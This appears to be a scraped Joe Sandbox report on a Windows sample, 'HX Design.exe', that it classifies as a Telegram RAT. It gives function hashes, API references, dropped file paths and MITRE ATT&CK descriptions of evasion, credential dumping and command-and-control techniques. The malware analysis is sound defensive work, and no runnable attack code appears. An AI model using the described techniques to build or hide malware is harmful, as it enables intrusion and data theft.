Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 0827a57cd214d5d603c9843579ba64e3507f40d2e1e167af68632560fe601457
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: 0C116D32608B8192EB219F15F40426AB7E5FB88B98F984230EF8D07768DF7CD555CB00

Function 00007FF73208073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF73208076C
GetDriveTypeW.KERNEL32 ref: 00007FF7320807AC

Strings

:, xrefs: 00007FF732080795

Memory Dump Source

Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true

Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: 7d7887c1f5e57843612841c26cdfcad197fa124ac1919c008f8ab5197126098e
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: 5301A721D1C30395F720BF64946527FA3A0EF44744FC00036D54D46691EFBCD548EB24

Function 00007FFE00318B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00007FFE003183B4), ref: 00007FFE00318B36
SystemTimeToFileTime.KERNEL32(?,00007FFE003183B4), ref: 00007FFE00318B46

Strings

gfff, xrefs: 00007FFE00318B7A

Memory Dump Source

Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true

Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction ID: 0b6c5dbe62472a748e99f9f5b8fe0fe660c4f68ee8d397e616ed6c2f32e6da31
Opcode Fuzzy Hash: e25ff0695230b9ef20f6353c867282db066572866cf8b2610bfc2824b0035600
Instruction Fuzzy Hash: D001D6E2B1864582EF61DB29F8011996790FBCC784F449032E75ECBB69EE2CD2058B40

Analysis Process: powershell.exePID: 7704, Parent PID: 7596COMMON

Executed Functions

Function 00007FFD9A4C3DB1 Relevance: 1.4, Instructions: 1354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1827102528.00007FFD9A4C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A4C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a4c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1365b618915ff8f7fac3b864c49c7965954b1c8333f03125c088bcd743b06a38
Instruction ID: 5b7a951c8d9f95916635ff80088f2b8627b3e3d98fb2f8f0920c249d97df8d01
Opcode Fuzzy Hash: 1365b618915ff8f7fac3b864c49c7965954b1c8333f03125c088bcd743b06a38
Instruction Fuzzy Hash: 4F820C22B0DB850FE76AA76858795F47BF1EF56220B1A01FBD08DC71D7DD186C068392

Function 00007FFD9A3F60C5 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2faa92a19fc16d02b55a1e5ded452e5d7b4b39d6812923154446579b2046ab35
Instruction ID: c8687549ce0945c64e1443b9cf5a03bdc28c173822c1ad5c7ece6cf7f8f8dc7f
Opcode Fuzzy Hash: 2faa92a19fc16d02b55a1e5ded452e5d7b4b39d6812923154446579b2046ab35
Instruction Fuzzy Hash: 4B11E722A1D7C54FE717AB749C350A5BFB0EF23211B0941EBD489C70E3DB186808C392

Function 00007FFD9A3FA15A Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b4e4f099a994c900072ca438e92f502b84ff561883ca3f1f0245227f0e024c1
Instruction ID: 468e151eb56e0faaaf77eb123f60b12a6c72743abdd250c10a4d76c10c3feccd
Opcode Fuzzy Hash: 8b4e4f099a994c900072ca438e92f502b84ff561883ca3f1f0245227f0e024c1
Instruction Fuzzy Hash: 05414C66B5E7C55FEB176BB85C750993F70DE9321870E01EBC494CF0A3E918181983A6

Function 00007FFD9A3F9E78 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912a93886384fba4841e41f0e7ebcb9f0f2c1288006d2f15bd308ab5342c67ce
Instruction ID: 2e6ecbe82ad1adc84d0725899ec71dcb488fedc33926ab6207249972bd03fb23
Opcode Fuzzy Hash: 912a93886384fba4841e41f0e7ebcb9f0f2c1288006d2f15bd308ab5342c67ce
Instruction Fuzzy Hash: 5FF08232A28A4DCFD746EF6898285E97BE0EF65301B0501ABD81DC7062DB259948CBC1

Function 00007FFD9A3F9890 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6b833295315f5a50f6e460a24379b7853e231493d296308b97838ea2547b0d
Instruction ID: ca05ca02af6b6500b59c598a9e00e85f946ff48df577e484187f6cdd7809082f
Opcode Fuzzy Hash: dd6b833295315f5a50f6e460a24379b7853e231493d296308b97838ea2547b0d
Instruction Fuzzy Hash: 5C412932B1CB884FEB199B9CAC566A97BE0FB95311F04427FD099C3192CA25B805C7D2

Function 00007FFD9A3FA74C Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f7510203a8c3e1ed33c50188075154fc6a4c5b23831a1151cc517e313346ba
Instruction ID: 8a6050a70492701ff9faf08052cb6805975dc8c34f4cd2f313f6bd9e18b9d1b6
Opcode Fuzzy Hash: 57f7510203a8c3e1ed33c50188075154fc6a4c5b23831a1151cc517e313346ba
Instruction Fuzzy Hash: 29412832A1C7884FEB19DBAC984A7E9BFF0EB56331F04416FD049C3152C675A45ACB92

Function 00007FFD9A2DE380 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1825518868.00007FFD9A2DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A2DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a2dd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36f83d7046c88d9fd8b81f7176abbf2d8e60238ab669869c9be2e91930b683d
Instruction ID: 109a55a847a0badbbf3dc16890d7984adfc56397e7bcc4b78cdc7b49f3acb2a4
Opcode Fuzzy Hash: e36f83d7046c88d9fd8b81f7176abbf2d8e60238ab669869c9be2e91930b683d
Instruction Fuzzy Hash: 92414B7140EBC44FD76A8B3998519623FF0EF52314B1906EFD088CF1A3D625E846C792

Function 00007FFD9A3F33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1826617218.00007FFD9A3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd9a3f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 0b968b20f9a29bf9e67fb101992b9066a7b9327b628ee10b1c347d3c5ee51bcf
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 0801A73121CB0C4FD748EF4CE451AA5B7E0FB85364F10056EE58AC3695DB36E882CB42

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report HX Design.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

Windows Analysis Report
HX Design.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre